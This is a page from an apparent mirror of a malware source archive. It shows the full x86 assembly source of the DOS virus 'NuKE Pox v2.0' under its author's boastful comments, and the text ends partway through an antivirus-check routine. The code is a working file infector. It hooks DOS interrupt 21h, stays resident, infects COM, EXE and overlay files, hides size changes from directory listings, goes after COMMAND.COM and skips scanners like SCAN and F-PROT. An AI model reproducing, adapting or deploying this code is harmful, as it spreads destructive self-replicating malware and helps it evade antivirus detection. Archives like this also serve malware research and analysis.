mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
1454 lines
109 KiB
NASM
1454 lines
109 KiB
NASM
|
;==========================================================================
|
||
|
; ** NuKE Pox v2.0 **
|
||
|
;This is VERY old code but I promised to give it out, you'll see it exactly
|
||
|
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
|
||
|
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to
|
||
|
;see, and understand it! I don't care if you fuck with it, go for it!
|
||
|
;The method of TSR is old, method of getting the Vectors is bad, the way
|
||
|
;I infect EXEs ain't too hot... But hell it works! It infects overlays..
|
||
|
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or
|
||
|
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
|
||
|
;
|
||
|
;And to all those that said I `Hacked' this...
|
||
|
; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU
|
||
|
; FF UU UU CC CC KK KK YY YY OO OO UU UU
|
||
|
; FFFF UU UU CC KKK === YY OO OO UU UU
|
||
|
; FF UU UU CC CC KK KK YY OO OO UU UU
|
||
|
; FF UUUUUU CCCC KK KK YY OOOO UUUUUU
|
||
|
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are
|
||
|
;500% better than this one...
|
||
|
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
;-* (c) Rock Steady, Viral Developments -*
|
||
|
;*- (c) NuKE Software Developement 1991, 1992 *-
|
||
|
;-* -*
|
||
|
;*- Virus: NuKE PoX Version: 2.0 *-
|
||
|
;-* ~~~~~~ ~~~~~~~~ -*
|
||
|
;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *-
|
||
|
;-* Will Disinfect files that are opened, and re-infect them -*
|
||
|
;*- when they are closed! Executed files are disinfected then *-
|
||
|
;-* executed, and when terminated reinfected! -*
|
||
|
;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *-
|
||
|
;-* It is listed as a COMMON Virus due to is stealthiness! -*
|
||
|
;*- Bytes: 1800 Bytes *-
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
||
|
virus_size equ last - init_virus ;Virus size
|
||
|
mut1 equ 3
|
||
|
mut2 equ 1
|
||
|
mut3 equ 103h ;Offset location
|
||
|
|
||
|
seg_a segment byte public
|
||
|
assume cs:seg_a, ds:seg_a
|
||
|
org 100h ;COM file!
|
||
|
rocko proc far
|
||
|
start: jmp init_virus
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Virus Begins Here...
|
||
|
;-------------------------------------------------------------------------
|
||
|
init_virus: call doit_now ;Doit VirusMan...
|
||
|
doit_now: pop bp ;Not to Lose Track
|
||
|
sub bp,106h ;Set our position
|
||
|
push ax ;Save all the regesters
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push si
|
||
|
push di
|
||
|
push bp
|
||
|
push es
|
||
|
push ds
|
||
|
mov ax,0abcdh ;Are we resident Already?
|
||
|
int 21h ;***McAfee Scan String!
|
||
|
cmp bx,0abcdh ;Yupe... Quit Then...
|
||
|
je exit_com
|
||
|
push cs ;Get CS=DS
|
||
|
pop ds
|
||
|
mov cx,es
|
||
|
mov ax,3521h ;Sometimes tend to inter-
|
||
|
int 21h ;cept this Interrupt...
|
||
|
mov word ptr cs:[int21+2][bp],es ;Save the Int
|
||
|
mov word ptr cs:[int21][bp],bx ;Vector Table
|
||
|
dec cx ;Get a new Memory block
|
||
|
mov es,cx ;Put it Back to ES
|
||
|
mov bx,es:mut1 ;Get TOM size
|
||
|
mov dx,virus_size ;Virus size in DX
|
||
|
mov cl,4 ;Shift 4 bits
|
||
|
shr dx,cl ;Fast way to divide by 16
|
||
|
add dx,4 ;add 1 more para segment
|
||
|
mov cx,es ;current MCB segment
|
||
|
sub bx,dx ;sub virus_size from TOM
|
||
|
inc cx ;put back right location
|
||
|
mov es,cx
|
||
|
mov ah,4ah ;Set_block
|
||
|
int 21h
|
||
|
|
||
|
jc exit_com
|
||
|
mov ah,48h ;now allocate it
|
||
|
dec dx ;number of para
|
||
|
mov bx,dx ;
|
||
|
int 21h
|
||
|
jc exit_com
|
||
|
dec ax ;get MCB
|
||
|
mov es,ax
|
||
|
mov cx,8h ;Made DOS the owner of MCB
|
||
|
mov es:mut2,cx ;put it...
|
||
|
sub ax,0fh ;get TOM
|
||
|
mov di,mut3 ;beginnig of our loc in mem
|
||
|
mov es,ax ;
|
||
|
mov si,bp ;delta pointer
|
||
|
add si,offset init_virus ;where to start
|
||
|
mov cx,virus_size
|
||
|
cld
|
||
|
repne movsb ;move us
|
||
|
|
||
|
mov ax,2521h ;Restore Int21 with ours
|
||
|
mov dx,offset int21_handler ;Where it starts
|
||
|
push es
|
||
|
pop ds
|
||
|
int 21h
|
||
|
exit_com: push cs
|
||
|
pop ds
|
||
|
cmp word ptr cs:[buffer][bp],5A4Dh
|
||
|
je exit_exe_file
|
||
|
mov bx,offset buffer ;Its a COM file restore
|
||
|
add bx,bp ;First three Bytes...
|
||
|
mov ax,[bx] ;Mov the Byte to AX
|
||
|
mov word ptr ds:[100h],ax ;First two bytes Restored
|
||
|
add bx,2 ;Get the next Byte
|
||
|
mov al,[bx] ;Move the Byte to AL
|
||
|
mov byte ptr ds:[102h],al ;Restore the Last of 3b
|
||
|
pop ds
|
||
|
pop es
|
||
|
pop bp ;Restore Regesters
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
mov ax,100h ;Jump Back to Beginning
|
||
|
push ax ;Restores our IP (a CALL
|
||
|
retn ;Saves them, now we changed
|
||
|
command db "C:\COMMAND.COM",0
|
||
|
|
||
|
exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc
|
||
|
mov dx,cs ;
|
||
|
sub dx,bx
|
||
|
mov ax,dx
|
||
|
add ax,word ptr cs:[exe_cs][bp] ;add it to our segs
|
||
|
add dx,word ptr cs:[exe_ss][bp]
|
||
|
mov bx,word ptr cs:[exe_ip][bp]
|
||
|
mov word ptr cs:[fuck_yeah][bp],bx
|
||
|
mov word ptr cs:[fuck_yeah+2][bp],ax
|
||
|
mov ax,word ptr cs:[exe_ip][bp]
|
||
|
mov word ptr cs:[Rock_fix1][bp],dx
|
||
|
mov word ptr cs:[Rock_fix2][bp],ax
|
||
|
pop ds
|
||
|
pop es
|
||
|
pop bp
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
db 0B8h ;nothing but MOV AX,XXXX
|
||
|
Rock_Fix1:
|
||
|
dw 0
|
||
|
cli
|
||
|
mov ss,ax
|
||
|
db 0BCh ;nothing but MOV SP,XXXX
|
||
|
Rock_Fix2:
|
||
|
dw 0
|
||
|
sti
|
||
|
db 0EAh ;nothing but JMP XXXX:XXXX
|
||
|
Fuck_yeah:
|
||
|
dd 0
|
||
|
int21 dd ? ;Our Old Int21
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Dir Handler
|
||
|
;-------------------------------------------------------------------------
|
||
|
old_dir: call calldos21 ;get FCB
|
||
|
test al,al ;error?
|
||
|
jnz old_out ;nope
|
||
|
push ax
|
||
|
push bx
|
||
|
push es
|
||
|
mov ah,51h ;get PSP
|
||
|
int 21h
|
||
|
mov es,bx ;
|
||
|
cmp bx,es:[16h] ;
|
||
|
jnz not_infected
|
||
|
mov bx,dx
|
||
|
mov al,[bx]
|
||
|
push ax
|
||
|
mov ah,2fh
|
||
|
int 21h
|
||
|
pop ax
|
||
|
inc al ;Extended FCB?
|
||
|
jnz fcb_okay
|
||
|
add bx,7h
|
||
|
fcb_okay: mov ax,es:[bx+17h]
|
||
|
and ax,1fh
|
||
|
cmp al,1eh
|
||
|
jnz not_infected
|
||
|
and byte ptr es:[bx+17h],0e0h ;fix secs
|
||
|
sub word ptr es:[bx+1dh],virus_size
|
||
|
sbb word ptr es:[bx+1fh],0
|
||
|
not_infected: pop es
|
||
|
pop bx
|
||
|
pop ax
|
||
|
old_out: iret
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Int 21 Handler
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
int21_handler: cmp ah,11h
|
||
|
je old_dir
|
||
|
cmp ah,12h
|
||
|
je old_dir
|
||
|
cmp ax,4b00h ;File executed
|
||
|
je dis_infect
|
||
|
cmp ah,3dh
|
||
|
je check_file
|
||
|
cmp ah,3eh
|
||
|
je check_file2
|
||
|
cmp ax,0abcdh ;Virus testing
|
||
|
jne int21call
|
||
|
mov bx,0abcdh
|
||
|
int21call: jmp dword ptr cs:[int21] ;Split...
|
||
|
|
||
|
check_file: jmp opening_file ;Like a Charm
|
||
|
check_file2: jmp closing_file
|
||
|
dis_infect: call disinfect ;EXE & COM okay
|
||
|
dont_disinfect: push dx
|
||
|
pushf
|
||
|
push cs
|
||
|
call int21call
|
||
|
pop dx
|
||
|
|
||
|
execute: push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
push bp
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov dx,offset command
|
||
|
mov bp,0abcdh
|
||
|
jmp command1
|
||
|
command_ret: pop bp
|
||
|
pop ds
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
call check_4_av
|
||
|
jc exit1
|
||
|
command1: mov ax,4300h ;Get file Attribs
|
||
|
call calldos21
|
||
|
jc exit1
|
||
|
test cl,1h ;Make sure there normal
|
||
|
jz open_file ;Okay there are
|
||
|
and cl,0feh ;Nope, Fix them...
|
||
|
mov ax,4301h ;Save them now
|
||
|
call calldos21
|
||
|
jc exit
|
||
|
open_file: mov ax,3D02h
|
||
|
call calldos21
|
||
|
exit1: jc exit
|
||
|
mov bx,ax ;BX File handler
|
||
|
mov ax,5700h ;Get file TIME + DATE
|
||
|
Call calldos21
|
||
|
mov al,cl
|
||
|
or cl,1fh ;Un mask Seconds
|
||
|
dec cx ;60 seconds
|
||
|
xor al,cl ;Is it 60 seconds?
|
||
|
jz exit ;File already infected
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov word ptr ds:[old_time],cx ;Save Time
|
||
|
mov word ptr ds:[old_date],dx ;Save Date
|
||
|
mov ah,3Fh
|
||
|
mov cx,1Bh ;Read first 1B
|
||
|
mov dx,offset ds:[buffer] ;into our Buffer
|
||
|
call calldos21
|
||
|
jc exit_now ;Error Split
|
||
|
mov ax,4202h ;Move file pointer
|
||
|
xor cx,cx ;to EOF File
|
||
|
xor dx,dx
|
||
|
call calldos21
|
||
|
jc exit_now ;Error Split
|
||
|
cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE?
|
||
|
je exe_infect ;Infect EXE file
|
||
|
mov cx,ax
|
||
|
sub cx,3 ;Set the JMP
|
||
|
mov word ptr ds:[jump_address+1],cx
|
||
|
call infect_me ;Infect!
|
||
|
jc exit
|
||
|
mov ah,40h ;Write back the
|
||
|
mov dx,offset jump_address
|
||
|
mov cx,3h
|
||
|
call calldos21
|
||
|
exit_now:
|
||
|
mov cx,word ptr ds:[old_time] ;Restore old time
|
||
|
mov dx,word ptr ds:[old_date] ;Restore Old date
|
||
|
mov ax,5701h
|
||
|
call calldos21
|
||
|
mov ah,3Eh
|
||
|
call calldos21
|
||
|
exit: cmp bp,0abcdh
|
||
|
je command2
|
||
|
pop ds
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
iret
|
||
|
command2: jmp command_ret
|
||
|
|
||
|
exe_infect: mov cx,word ptr cs:[buffer+20]
|
||
|
mov word ptr cs:[exe_ip],cx
|
||
|
mov cx,word ptr cs:[buffer+22]
|
||
|
mov word ptr cs:[exe_cs],cx
|
||
|
mov cx,word ptr cs:[buffer+16]
|
||
|
mov word ptr cs:[exe_sp],cx
|
||
|
mov cx,word ptr cs:[buffer+14]
|
||
|
mov word ptr cs:[exe_ss],cx
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply
|
||
|
sub dx,word ptr cs:[buffer+8]
|
||
|
mov word ptr cs:[vir_cs],dx
|
||
|
push ax
|
||
|
push dx
|
||
|
call infect_me
|
||
|
pop dx
|
||
|
pop ax
|
||
|
mov word ptr cs:[buffer+22],dx
|
||
|
mov word ptr cs:[buffer+20],ax
|
||
|
pop dx
|
||
|
pop ax
|
||
|
jc exit
|
||
|
add ax,virus_size
|
||
|
adc dx,0
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply
|
||
|
sub dx,word ptr cs:[buffer+8]
|
||
|
add ax,40h
|
||
|
mov word ptr cs:[buffer+14],dx
|
||
|
mov word ptr cs:[buffer+16],ax
|
||
|
pop dx
|
||
|
pop ax
|
||
|
push bx
|
||
|
push cx
|
||
|
mov cl,7
|
||
|
shl dx,cl
|
||
|
mov bx,ax
|
||
|
mov cl,9
|
||
|
shr bx,cl
|
||
|
add dx,bx
|
||
|
and ax,1FFh
|
||
|
jz outta_here
|
||
|
inc dx
|
||
|
outta_here: pop cx
|
||
|
pop bx
|
||
|
mov word ptr cs:[buffer+2],ax
|
||
|
mov word ptr cs:[buffer+4],dx
|
||
|
mov ah,40h
|
||
|
mov dx,offset ds:[buffer]
|
||
|
mov cx,20h
|
||
|
call calldos21
|
||
|
exit_exe: jmp exit_now
|
||
|
rocko endp
|
||
|
vir_cs dw 0
|
||
|
exe_ip dw 0
|
||
|
exe_cs dw 0
|
||
|
exe_sp dw 0
|
||
|
exe_ss dw 0
|
||
|
exe_sz dw 0
|
||
|
exe_rm dw 0
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Opening File handle AX=3D
|
||
|
;-------------------------------------------------------------------------
|
||
|
opening_file: call check_extension
|
||
|
jnc open_fuck2
|
||
|
call check_exten_exe
|
||
|
jnc open_fuck2
|
||
|
jmp dword ptr cs:[int21]
|
||
|
open_fuck2: push ax
|
||
|
mov ax,3d02h
|
||
|
call calldos21
|
||
|
jnc open_fuck1
|
||
|
pop ax
|
||
|
iret
|
||
|
open_fuck1: push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
mov bx,ax
|
||
|
mov ax,5700h
|
||
|
call calldos21
|
||
|
mov al,cl
|
||
|
or cl,1fh
|
||
|
dec cx ;60 Seconds
|
||
|
xor al,cl
|
||
|
jnz opening_exit3
|
||
|
dec cx
|
||
|
mov word ptr cs:[old_time],cx
|
||
|
mov word ptr cs:[old_date],dx
|
||
|
mov ax,4202h ;Yes Pointer to EOF
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
call calldos21
|
||
|
mov cx,dx
|
||
|
mov dx,ax
|
||
|
push cx
|
||
|
push dx
|
||
|
sub dx,1Bh ;Get first 3 Bytes
|
||
|
sbb cx,0
|
||
|
mov ax,4200h
|
||
|
call calldos21
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ah,3fh ;Read them into Buffer
|
||
|
mov cx,1Bh
|
||
|
mov dx,offset buffer
|
||
|
call calldos21
|
||
|
xor cx,cx ;Goto Beginning of File
|
||
|
xor dx,dx
|
||
|
mov ax,4200h
|
||
|
call calldos21
|
||
|
mov ah,40h ;Write first three bytes
|
||
|
mov dx,offset buffer
|
||
|
mov cx,1Bh
|
||
|
cmp word ptr cs:[buffer],5A4Dh
|
||
|
je open_exe_jmp
|
||
|
mov cx,3h
|
||
|
open_exe_jmp: call calldos21
|
||
|
pop dx ;EOF - Virus_Size
|
||
|
pop cx ;to get ORIGINAL File size
|
||
|
sub dx,virus_size
|
||
|
sbb cx,0
|
||
|
mov ax,4200h
|
||
|
call calldos21
|
||
|
mov ah,40h ;Fix Bytes
|
||
|
xor cx,cx
|
||
|
call calldos21
|
||
|
mov cx,word ptr cs:[old_time]
|
||
|
mov dx,word ptr cs:[old_date]
|
||
|
mov ax,5701h
|
||
|
int 21h
|
||
|
mov ah,3eh ;Close File
|
||
|
call calldos21
|
||
|
opening_exit3: pop ds
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
jmp dword ptr cs:[int21]
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Closing File Handle INFECT it!
|
||
|
;-------------------------------------------------------------------------
|
||
|
closing_file: cmp bx,0h
|
||
|
je closing_bye
|
||
|
cmp bx,5h
|
||
|
ja close_cont
|
||
|
closing_bye: jmp dword ptr cs:[int21]
|
||
|
|
||
|
close_cont: push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push di
|
||
|
push ds
|
||
|
push es
|
||
|
push bp
|
||
|
push bx
|
||
|
mov ax,1220h
|
||
|
int 2fh
|
||
|
mov ax,1216h
|
||
|
mov bl,es:[di]
|
||
|
int 2fh
|
||
|
pop bx
|
||
|
add di,0011h
|
||
|
mov byte ptr es:[di-0fh],02h
|
||
|
add di,0017h
|
||
|
cmp word ptr es:[di],'OC'
|
||
|
jne closing_next_try
|
||
|
cmp byte ptr es:[di+2h],'M'
|
||
|
jne pre_exit
|
||
|
jmp closing_cunt3
|
||
|
closing_next_try:
|
||
|
cmp word ptr es:[di],'XE'
|
||
|
jne pre_exit
|
||
|
cmp byte ptr es:[di+2h],'E'
|
||
|
jne pre_exit
|
||
|
closing_cunt: cmp word ptr es:[di-8],'CS'
|
||
|
jnz closing_cunt1 ;SCAN
|
||
|
cmp word ptr es:[di-6],'NA'
|
||
|
jz pre_exit
|
||
|
closing_cunt1: cmp word ptr es:[di-8],'-F'
|
||
|
jnz closing_cunt2 ;F-PROT
|
||
|
cmp word ptr es:[di-6],'RP'
|
||
|
jz pre_exit
|
||
|
closing_cunt2: cmp word ptr es:[di-8],'LC'
|
||
|
jnz closing_cunt3
|
||
|
cmp word ptr es:[di-6],'AE' ;CLEAN
|
||
|
jnz closing_cunt3
|
||
|
pre_exit: jmp closing_nogood
|
||
|
closing_cunt3: mov ax,5700h
|
||
|
call calldos21
|
||
|
|
||
|
mov al,cl
|
||
|
or cl,1fh
|
||
|
dec cx ;60 Seconds
|
||
|
xor al,cl
|
||
|
jz closing_nogood
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov word ptr ds:[old_time],cx
|
||
|
mov word ptr ds:[old_date],dx
|
||
|
mov ax,4200h
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
call calldos21
|
||
|
mov ah,3fh
|
||
|
mov cx,1Bh
|
||
|
mov dx,offset buffer
|
||
|
call calldos21
|
||
|
jc closing_no_good
|
||
|
mov ax,4202h
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
call calldos21
|
||
|
jc closing_no_good
|
||
|
cmp word ptr ds:[buffer],5A4Dh
|
||
|
je closing_exe
|
||
|
mov cx,ax
|
||
|
sub cx,3h
|
||
|
mov word ptr ds:[jump_address+1],cx
|
||
|
call infect_me
|
||
|
jc closing_no_good
|
||
|
mov ah,40h
|
||
|
mov dx,offset jump_address
|
||
|
mov cx,3h
|
||
|
call calldos21
|
||
|
closing_no_good:
|
||
|
mov cx,word ptr ds:[old_time]
|
||
|
mov dx,word ptr ds:[old_date]
|
||
|
mov ax,5701h
|
||
|
call calldos21
|
||
|
closing_nogood: pop bp
|
||
|
pop es
|
||
|
pop ds
|
||
|
pop di
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
jmp dword ptr cs:[int21]
|
||
|
closing_exe: mov cx,word ptr cs:[buffer+20]
|
||
|
mov word ptr cs:[exe_ip],cx
|
||
|
mov cx,word ptr cs:[buffer+22]
|
||
|
mov word ptr cs:[exe_cs],cx
|
||
|
mov cx,word ptr cs:[buffer+16]
|
||
|
mov word ptr cs:[exe_sp],cx
|
||
|
mov cx,word ptr cs:[buffer+14]
|
||
|
mov word ptr cs:[exe_ss],cx
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply
|
||
|
sub dx,word ptr cs:[buffer+8]
|
||
|
mov word ptr cs:[vir_cs],dx
|
||
|
push ax
|
||
|
push dx
|
||
|
call infect_me
|
||
|
pop dx
|
||
|
pop ax
|
||
|
mov word ptr cs:[buffer+22],dx
|
||
|
mov word ptr cs:[buffer+20],ax
|
||
|
pop dx
|
||
|
pop ax
|
||
|
jc closing_no_good
|
||
|
add ax,virus_size
|
||
|
adc dx,0
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply
|
||
|
sub dx,word ptr cs:[buffer+8]
|
||
|
add ax,40h
|
||
|
mov word ptr cs:[buffer+14],dx
|
||
|
mov word ptr cs:[buffer+16],ax
|
||
|
pop dx
|
||
|
pop ax
|
||
|
push bx
|
||
|
push cx
|
||
|
mov cl,7
|
||
|
shl dx,cl
|
||
|
mov bx,ax
|
||
|
mov cl,9
|
||
|
shr bx,cl
|
||
|
add dx,bx
|
||
|
and ax,1FFh
|
||
|
jz close_split
|
||
|
inc dx
|
||
|
close_split: pop cx
|
||
|
pop bx
|
||
|
mov word ptr cs:[buffer+2],ax
|
||
|
mov word ptr cs:[buffer+4],dx
|
||
|
mov ah,40h
|
||
|
mov dx,offset ds:[buffer]
|
||
|
mov cx,20h
|
||
|
call calldos21
|
||
|
closing_over: jmp closing_no_good
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Infection Routine...
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
infect_me proc
|
||
|
mov ah,40h
|
||
|
mov dx,offset init_virus
|
||
|
mov cx,virus_size
|
||
|
call calldos21
|
||
|
jc exit_error ;Error Split
|
||
|
mov ax,4200h
|
||
|
xor cx,cx ;Pointer back to
|
||
|
xor dx,dx ;top of file
|
||
|
call calldos21
|
||
|
jc exit_error ;Split Dude...
|
||
|
clc ;Clear carry flag
|
||
|
ret
|
||
|
exit_error:
|
||
|
stc ;Set carry flag
|
||
|
ret
|
||
|
infect_me endp
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; DisInfection Routine for 4B
|
||
|
;-------------------------------------------------------------------------
|
||
|
Disinfect PROC
|
||
|
push ax
|
||
|
push bx ;Save them
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
mov ax,4300h ;Get file Attribs
|
||
|
call calldos21
|
||
|
test cl,1h ;Test for Normal Attribs
|
||
|
jz okay_dis ;Yes, File can be opened
|
||
|
and cl,0feh ;No, Set them to Normal
|
||
|
mov ax,4301h ;Save attribs to file
|
||
|
call calldos21
|
||
|
jc half_way
|
||
|
okay_dis: mov ax,3d02h ;File now can be opened
|
||
|
call calldos21 ;Safely
|
||
|
jc half_way
|
||
|
mov bx,ax ;Put File Handle in BX
|
||
|
mov ax,5700h ;Get File Time & Date
|
||
|
call calldos21
|
||
|
mov al,cl ;Check to see if infected
|
||
|
or cl,1fh ;Unmask Seconds
|
||
|
dec cx ;Test to see if 60 seconds
|
||
|
xor al,cl
|
||
|
jnz half_way ;No, Quit File AIN'T
|
||
|
dec cx
|
||
|
mov word ptr cs:[old_time],cx
|
||
|
mov word ptr cs:[old_date],dx
|
||
|
mov ax,4202h ;Yes, file is infected
|
||
|
xor cx,cx ;Goto the End of File
|
||
|
xor dx,dx
|
||
|
call calldos21
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov cx,dx ;Save Location into
|
||
|
mov dx,ax ;CX:DX
|
||
|
push cx ;Push them for later use
|
||
|
push dx
|
||
|
sub dx,1Bh ;Subtract file 1Bh from the
|
||
|
sbb cx,0 ;End so you will find the
|
||
|
mov ax,4200h ;Original EXE header or
|
||
|
call calldos21 ;First 3 bytes for COMs
|
||
|
mov ah,3fh ;Read them into Buffer
|
||
|
mov cx,1Bh ;Read all of the 1B bytes
|
||
|
mov dx,offset buffer ;Put them into our buffer
|
||
|
call calldos21
|
||
|
jmp half
|
||
|
half_way: jmp end_dis
|
||
|
half: xor cx,cx ;
|
||
|
xor dx,dx ;Goto the BEGINNING of file
|
||
|
mov ax,4200h
|
||
|
call calldos21
|
||
|
mov ah,40h ;Write first three bytes
|
||
|
mov dx,offset buffer ;from buffer to COM
|
||
|
mov cx,1Bh
|
||
|
cmp word ptr cs:[buffer],5A4Dh
|
||
|
je dis_exe_jmp
|
||
|
mov cx,3h
|
||
|
dis_exe_jmp: call calldos21
|
||
|
pop dx ;Restore CX:DX which they
|
||
|
pop cx ;to the End of FILE
|
||
|
sub dx,virus_size ;Remove Virus From the END
|
||
|
sbb cx,0 ;of the Orignal File
|
||
|
mov ax,4200h ;Get new EOF
|
||
|
call calldos21
|
||
|
mov ah,40h ;Write new EOF to File
|
||
|
xor cx,cx
|
||
|
call calldos21
|
||
|
mov cx,word ptr cs:[old_time]
|
||
|
mov dx,word ptr cs:[old_date]
|
||
|
mov ax,5701h
|
||
|
call calldos21
|
||
|
mov ah,3eh ;Close File
|
||
|
call calldos21
|
||
|
end_dis: pop ds
|
||
|
pop dx
|
||
|
pop cx ;Restore 'em
|
||
|
pop bx
|
||
|
pop ax
|
||
|
ret
|
||
|
disinfect ENDP
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Check File Extension DS:DX ASCIIZ
|
||
|
;--------------------------------------------------------------------------
|
||
|
Check_extension PROC
|
||
|
push si
|
||
|
push cx
|
||
|
mov si,dx
|
||
|
mov cx,256h
|
||
|
loop_me: cmp byte ptr ds:[si],2eh
|
||
|
je next_ok
|
||
|
inc si
|
||
|
loop loop_me
|
||
|
next_ok: cmp word ptr ds:[si+1],'OC'
|
||
|
jne next_1
|
||
|
cmp byte ptr ds:[si+3],'M'
|
||
|
je good_file
|
||
|
next_1: cmp word ptr ds:[si+1],'oc'
|
||
|
jne next_2
|
||
|
cmp byte ptr ds:[si+3],'m'
|
||
|
je good_file
|
||
|
next_2: pop cx
|
||
|
pop si
|
||
|
stc
|
||
|
ret
|
||
|
good_file: pop cx
|
||
|
pop si
|
||
|
clc
|
||
|
ret
|
||
|
Check_extension ENDP
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Check File Extension DS:DX ASCIIZ
|
||
|
;-------------------------------------------------------------------------
|
||
|
Check_exten_exe PROC
|
||
|
push si
|
||
|
push cx
|
||
|
mov si,dx
|
||
|
mov cx,256h
|
||
|
loop_me_exe: cmp byte ptr ds:[si],2eh
|
||
|
je next_ok_exe
|
||
|
inc si
|
||
|
loop loop_me_exe
|
||
|
next_ok_exe: cmp word ptr ds:[si+1],'XE'
|
||
|
jne next_1_exe
|
||
|
cmp byte ptr ds:[si+3],'E'
|
||
|
je good_file_exe
|
||
|
next_1_exe: cmp word ptr ds:[si+1],'xe'
|
||
|
jne next_2_exe
|
||
|
cmp byte ptr ds:[si+3],'e'
|
||
|
je good_file_exe
|
||
|
next_2_exe: pop cx
|
||
|
pop si
|
||
|
stc
|
||
|
ret
|
||
|
good_file_exe: pop cx
|
||
|
pop si
|
||
|
clc
|
||
|
ret
|
||
|
Check_exten_exe ENDP
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Call Int_21h Okay
|
||
|
;-------------------------------------------------------------------------
|
||
|
calldos21 PROC
|
||
|
pushf
|
||
|
call dword ptr cs:[int21]
|
||
|
retn
|
||
|
calldos21 ENDP
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; MultiPly
|
||
|
;--------------------------------------------------------------------------
|
||
|
multiply PROC
|
||
|
push bx
|
||
|
push cx
|
||
|
mov cl,0Ch
|
||
|
shl dx,cl
|
||
|
xchg bx,ax
|
||
|
mov cl,4
|
||
|
shr bx,cl
|
||
|
and ax,0Fh
|
||
|
add dx,bx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
retn
|
||
|
multiply ENDP
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Check for AV file... Like SCAN.EXE or F-PROT.EXE
|
||
|
;-------------------------------------------------------------------------
|
||
|
Check_4_av PROC
|
||
|
push si
